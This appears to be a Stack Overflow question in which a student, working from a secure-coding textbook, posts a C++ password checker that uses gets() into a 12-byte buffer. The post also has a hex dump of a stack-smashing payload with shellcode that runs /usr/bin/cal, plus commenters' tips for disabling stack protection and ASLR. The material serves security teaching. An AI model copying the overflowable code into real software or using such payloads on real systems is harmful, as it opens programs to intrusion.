0

I am doing some homework for University and the book I am working from (Secure coding in C and C++ by Robert Seacord) has the following example in it;

You write a simple enter password program and do a stack smash on the program to make the terminal display a calendar snapshot. It's really simple and straightforward as an example of stack smashing. Except I think the book we have to work through was written a long time ago, before Segmentation faults covered this sort of activity.

I have searched a lot of sites (I've added -fno-stach-protector to the g++ compiler, and also set kernel.randomize_va_space=0, neither of these were allowed the exploit code to execute.

Here is the password c++ code;

#include <cstring>
#include <stdio.h>
#include <iostream>

bool isPasswordOkay(void);

int main(void)
{
    bool PwStatus;

    puts("Enter password:");
    PwStatus = isPasswordOkay();
    if (PwStatus == false)
    {
        puts("Access denied");
        return 0;
    }
    else puts("Access granted");
    return 0;
}

bool isPasswordOkay(void)
{
    char Password[12];

    gets(Password);
    if (!strcmp(Password, "goodpass"))
    return true;
    else return(false);
}

and here is the exploit code (exploit.bin);

000  31 32 33 34 35 36 37 38–39 30 31 32 33 34 35 36 "1234567890123456"
010  37 38 39 30 31 32 33 34–35 36 37 38 E0 F9 FF BF "789012345678a. +"
020  31 C0 A3 FF F9 FF BF B0–0B BB 03 FA FF BF B9 FB "1+ú . +≠+. +≠v"
030  F9 FF BF 8B 15 FF F9 FF–BF CD 80 FF F9 FF BF 31 ". +ï§ . +−ç . +1"
040  31 31 31 2F 75 73 72 2F–62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal "

Once the password code has been compiled I execute by entering ./a.out < exploit.bin

When executed, the terminal returns "Segmentation fault (core dumped)". What it should show is a snapshot of the calendar found at "111/usr/bin/cal ".

My question is, is there a way to temporarily disable this segmentation fault in order to allow the exploit code to execute? This would allow me to then go on to do the section as I'm a bit stumped at the moment.

Thank you, Jon

EDIT: Unfortunatly I can't upload images yet as I'm new, but here is a link to a breakdown of the exploit.bin code; https://i.stack.imgur.com/X65mL.jpg

Jonathan Cain
  • 19
  • 3
  • Err.. what about asking your prof/TA, ie. those who are being paid to help you? – Martin James Apr 10 '15 at 15:57
  • because it's late on a Friday and I don't want to spend 3 days waiting for a response – Jonathan Cain Apr 10 '15 at 15:59
  • In that case. perhaps you could spend the weekend disassembling that bin and working out what it does and why it fails? – Martin James Apr 10 '15 at 16:01
  • Ok I could do that, however I'm under the impression that the segmentation fault is part of protection from stack smashing, nothing to do with the bin? The bin is copied straight from the book and the book itself breaks it down for you. If you're saying that's a valid solution then okay I'll give it a shot, but if I spend 3 days doing it and it turns out I was right that it was just ubuntu protecting the memory, then it's going to be a waste of 3 days. – Jonathan Cain Apr 10 '15 at 16:04
  • If the book has a disassembly, maybe you could post it? – Martin James Apr 10 '15 at 16:04
  • It surely is a hardware memory management exception that is handled by the OS, but why? You need to find out why so you can make some attempt to stop it happening. It's very likely, for instance, that the stack segment is not executable. If the bin relies upon that, it will fail. – Martin James Apr 10 '15 at 16:07
  • .. but you don't know becasue you have not disassembled the bin, so you don't know how it is supposed to work, – Martin James Apr 10 '15 at 16:09
  • `sysctl -w kernel.exec-shield=0` as root might work. IIRC that was supposed to stop these sorts of exploits – Andrew Henle Apr 10 '15 at 16:12
  • Ok I've added the code. This is the first lecture of my security module, so honestly Im pretty new to all this so I apologise for my general ignorance. – Jonathan Cain Apr 10 '15 at 16:12
  • thanks Andrew but exec-shield does not appear to exist in Ubuntu 14.04. To be honest I think I might just go find a much older version of linux and try this all again. – Jonathan Cain Apr 10 '15 at 16:25

0 Answers0